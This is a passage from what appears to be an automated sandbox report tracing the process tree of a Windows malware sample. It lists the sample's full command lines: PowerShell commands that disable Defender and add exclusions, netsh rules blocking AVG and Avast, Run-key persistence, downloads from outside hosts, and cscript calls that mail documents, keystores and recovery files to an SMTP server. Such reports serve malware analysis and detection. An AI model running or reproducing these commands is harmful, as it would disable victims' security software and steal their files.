        powershell Set-MpPreference -DisableRealtimeMonitoring $true
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2552
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -ThreatIDDefaultAction_Actions NoAction
        10⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2372
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -SubmitSamplesConsent NeverSend
        10⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Windows\java"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2080
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Windows\SysWOW64\java"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Windows\System32"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1656
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Windows\SysWOW64"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Windows\SysWOW64\xml"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1704
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\CrashReports\Java"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2516
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1112
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVG\avgsetupx.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:872
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVG\avgsetupx.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2812
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVG\avgmfapx.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:108
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVG\avgmfapx.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:924
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVG\avgsetupx.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2680
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVG\avgsetupx.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1896
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVG\avgmfapx.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2584
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVG\avgmfapx.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        
        PID:3044
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVG\Av\avgmfapx.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        
        PID:584
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVG\Av\avgmfapx.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1728
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVG\Setup\avgsetupx.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2832
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVG\Setup\avgsetupx.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2940
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVG\Av\avgmfapx.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2880
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVG\Av\avgmfapx.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:752
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVG\Setup\avgsetupx.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        
        PID:2428
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVG\Setup\avgsetupx.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2468
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVG\Antivirus\avgmfapx.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:552
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVG\Antivirus\avgmfapx.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3028
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVG\Setup\avgsetupx.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2340
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVG\Setup\avgsetupx.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1208
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVG\Antivirus\avgmfapx.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1068
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVG\Antivirus\avgmfapx.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2284
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVG\Setup\avgsetupx.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2916
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVG\Setup\avgsetupx.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2092
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVAST Software\Avast\setup\instup.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:676
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVAST Software\Avast\setup\instup.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2280
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVAST Software\Avast\AvastSvc.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1536
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVAST Software\Avast\AvastSvc.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2236
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVAST Software\Avast\avastui.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2476
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files (x86)\AVAST Software\Avast\avastui.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2788
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVAST Software\Avast\setup\instup.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1992
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVAST Software\Avast\setup\instup.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:760
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVAST Software\Avast\AvastSvc.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1620
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVAST Software\Avast\AvastSvc.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2668
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVAST Software\Avast\avastui.exe" protocol=any dir=in enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2724
        
        C:\Windows\system32\netsh.exe
        
        Netsh.exe advfirewall firewall add rule name="F-Av" program="C:\Program Files\AVAST Software\Avast\avastui.exe" protocol=any dir=out enable=yes action=block profile=any
        10⤵
        Modifies Windows Firewall
        
        PID:2380
        
        C:\Windows\SysWOW64\java\acgst-12-qknci.exe
        
        acgst-12-qknci.exe
        8⤵
        Executes dropped EXE
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:2808
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\5A41.tmp\(acgst-v12debknci').bat" "
        9⤵
        Loads dropped DLL
        
        PID:2624
        
        C:\Windows\SysWOW64\java\github.exe
        
        github.exe 1 acgst-v12-terkunci.exe acgst-v12.exe @@AcgsTtwelve@@#
        10⤵
        Executes dropped EXE
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:2252
        
        C:\Windows\SysWOW64\java\acgst-v12.exe
        
        acgst-v12.exe
        10⤵
        Executes dropped EXE
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:2348
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\5D1E.tmp\acgst-12®.bat" "
        11⤵
        Loads dropped DLL
        Drops file in Program Files directory
        
        PID:1784
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SmartAudioFilterAgent /f
        12⤵
        
        PID:2552
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 /v SmartAudioFilterAgent /f
        12⤵
        System Location Discovery: System Language Discovery
        
        PID:3064
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SmartAudioFilterAgent /f /reg:64
        12⤵
        
        PID:1576
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 /v SmartAudioFilterAgent /f /reg:64
        12⤵
        System Location Discovery: System Language Discovery
        
        PID:552
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SmartAudioFilterAgent /t REG_SZ /d C:\Windows\java\audiocheck.exe /f
        12⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:2412
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v WindowsTask /f
        12⤵
        
        PID:2496
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 /v WindowsTask /f
        12⤵
        System Location Discovery: System Language Discovery
        
        PID:3056
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v WindowsTask /f /reg:64
        12⤵
        
        PID:1872
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 /v WindowsTask /f /reg:64
        12⤵
        System Location Discovery: System Language Discovery
        
        PID:1808
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v WindowsTask /t REG_SZ /d C:\Windows\java\taskhosts.exe /f
        12⤵
        Adds Run key to start application
        
        PID:1656
        
        C:\Users\Admin\AppData\Local\Temp\getapcc-v+.exe
        
        "C:\Users\Admin\AppData\Local\Temp\getapcc-v+" --user-agent="Iphone Firefox/3.3.3" -N --tries=77 --read-timeout=300 http://ipm.biz.id/getapcc++/default.php
        12⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2056
        
        C:\Users\Admin\AppData\Local\Temp\getapcc-v+.exe
        
        "C:\Users\Admin\AppData\Local\Temp\getapcc-v+" --user-agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008092416 Firefox/3.0.3" -N --tries=77 --read-timeout=300 http://otwalkun.16mb.com/getapcc-v2/default.php-old
        12⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2728
        
        C:\Windows\SysWOW64\java\taskhosts.exe
        
        taskhosts.exe
        12⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2352
        
        C:\Windows\java\serviceapple.exe
        
        "C:\Windows\java\serviceapple.exe"
        13⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:296
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\7C41.tmp\applet+bknci'.bat" "
        14⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2772
        
        C:\Windows\java\skrip.exe
        
        skrip.exe 1 applet+terkunci.exe appleprocess.exe @12345#a
        15⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2500
        
        C:\Windows\java\appleprocess.exe
        
        appleprocess.exe
        15⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:580
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\7DB8.tmp\ServiceLocalNet.bat" "
        16⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:800
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 1 8.8.8.8
        17⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2664
        
        C:\Windows\SysWOW64\find.exe
        
        find "TTL="
        17⤵
        System Location Discovery: System Language Discovery
        
        PID:1728
        
        C:\Windows\java\get.exe
        
        get --user-agent="Iphone Firefox/3.3.3" -N --tries=77 --read-timeout=300 http://ipm.biz.id/alkunfresh++/audiocheck.php
        17⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2976
        
        C:\Windows\SysWOW64\java\handler+.exe
        
        handler+.exe
        12⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:3036
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\7CBE.tmp\handler+.bat" "
        13⤵
        Loads dropped DLL
        
        PID:2756
        
        C:\Windows\SysWOW64\java\handlersuperdat.exe
        
        handlersuperdat.exe
        14⤵
        Executes dropped EXE
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:2872
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\7DA8.tmp\handlersuperdat.bat" "
        15⤵
        Drops file in System32 directory
        
        PID:1124
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +h "superdat" /s /d
        16⤵
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:2480
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "superdat\-" /reset
        16⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2832
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "superdat\-" /inheritance:d
        16⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2252
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "superdat\-" /remove:g Admin /t /c
        16⤵
        Possible privilege escalation attempt
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:2860
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "superdat\-" /remove:g Administrators /t /c
        16⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1324
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "superdat\-" /reset
        14⤵
        Possible privilege escalation attempt
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:2356
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "superdat\-" /grant:r Administrators:(OI)(RC,RX,M)
        14⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2336
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "superdat\-" /grant:r Admin:(OI)(RC,RX,M)
        14⤵
        Possible privilege escalation attempt
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:1708
        
        C:\Windows\SysWOW64\java\superdat\-\superdat.exe
        
        superdat.exe
        14⤵
        Executes dropped EXE
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:784
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\83DF.tmp\superdat.bat" "
        15⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:2148
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 1 8.8.8.8
        16⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3008
        
        C:\Windows\SysWOW64\find.exe
        
        find "TTL="
        16⤵
        System Location Discovery: System Language Discovery
        
        PID:1556
        
        C:\Windows\SysWOW64\systeminfo.exe
        
        systeminfo.exe
        16⤵
        Gathers system information
        
        PID:2264
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /B /C:"OS Name" /C:"System Type" /C:"Host Name"
        16⤵
        System Location Discovery: System Language Discovery
        
        PID:2728
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\systeminfo-x64-or-x86-based.custom.txt" "
        16⤵
        
        PID:676
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "x64-based"
        16⤵
        System Location Discovery: System Language Discovery
        
        PID:1752
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +h C:\Users\Admin\AppData\Roaming
        16⤵
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:2600
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe /nologo "time-1.vbs" [email protected] [email protected] "Admin" "superdata BCXRJFKE Ddocx+xlsx+json smtp*smtp2love*mywire*org" smtp.smtp2love.mywire.org [email protected] [email protected]
        16⤵
        
        PID:760
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        16⤵
        Delays execution with timeout.exe
        
        PID:924
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe /nologo "time-2.vbs" [email protected] [email protected] "Admin" "superdata BCXRJFKE Edocx+xlsx+json smtp*smtp2love*mywire*org" smtp.smtp2love.mywire.org [email protected] [email protected]
        16⤵
        
        PID:1200
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        16⤵
        Delays execution with timeout.exe
        
        PID:1660
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe /nologo "time-3.vbs" [email protected] [email protected] "Admin" "superdata BCXRJFKE DTxt smtp*smtp2love*mywire*org" smtp.smtp2love.mywire.org [email protected] [email protected]
        16⤵
        System Location Discovery: System Language Discovery
        
        PID:1084
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        16⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2512
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe /nologo "time-4.vbs" [email protected] [email protected] "Admin" "superdata BCXRJFKE ETxt smtp*smtp2love*mywire*org" smtp.smtp2love.mywire.org [email protected] [email protected]
        16⤵
        
        PID:872
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        16⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:3052
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe /nologo "time-5.vbs" [email protected] [email protected] "Admin" "superdata BCXRJFKE Fdocx+xlsx+json smtp*smtp2love*mywire*org" smtp.smtp2love.mywire.org [email protected] [email protected]
        16⤵
        
        PID:1756
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        16⤵
        Delays execution with timeout.exe
        
        PID:2816
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe /nologo "time-6.vbs" [email protected] [email protected] "Admin" "superdata BCXRJFKE Ftxt smtp*smtp2love*mywire*org" smtp.smtp2love.mywire.org [email protected] [email protected]
        16⤵
        
        PID:236
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        16⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:576
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe /nologo "time-7.vbs" [email protected] [email protected] "Admin" "superdata BCXRJFKE DEFGHIJKeytore.txt.UTC smtp*smtp2love*mywire*org" smtp.smtp2love.mywire.org [email protected] [email protected]
        16⤵
        
        PID:2744
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        16⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:1324
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe /nologo "time-8.vbs" [email protected] [email protected] "Admin" "superdata BCXRJFKE CDEFrecovery.pdf smtp*smtp2love*mywire*org" smtp.smtp2love.mywire.org [email protected] [email protected]
        16⤵
        
        PID:3028
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        16⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2952
        
        C:\Windows\SysWOW64\systeminfo.exe
        
        systeminfo.exe
        12⤵
        Gathers system information
        
        PID:2060
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /B /C:"OS Name" /C:"System Type" /C:"Host Name"
        12⤵
        
        PID:2092
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\sysinfo-acgst.txt" "
        12⤵
        System Location Discovery: System Language Discovery
        
        PID:2236
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "x64-based"
        12⤵
        System Location Discovery: System Language Discovery
        
        PID:1436
  - - C:\Windows\SysWOW64\java\[email protected]
      [email protected]
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      PID:2204
    - - C:\Windows\SysWOW64\java\sshclients.exe
        
        "C:\Windows\SysWOW64\java\sshclients.exe"
        5⤵
        Executes dropped EXE
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:760
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\FF84.tmp\runstime.bat" "
        6⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2780
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 1 8.8.8.8
        7⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2492
        
        C:\Windows\SysWOW64\find.exe
        
        find "TTL="
        7⤵
        
        PID:1724
        
        C:\Windows\SysWOW64\java\getrunstime.exe
        
        getrunstime --user-agent="Iphone Firefox/3.3.3" -N --tries=77 --read-timeout=300 http://ipm.biz.id/runtime++/c@s/default.php
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:304
  - - C:\Windows\SysWOW64\java\notif-firts-.exe
      notif-firts-.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:2136
    - - C:\Users\Admin\AppData\Local\Temp\notif-firts.exe
        
        "C:\Users\Admin\AppData\Local\Temp\notif-firts.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2244
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\5E.tmp\protects-notif.bat" "
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2940
        
        C:\Windows\SysWOW64\PING.EXE
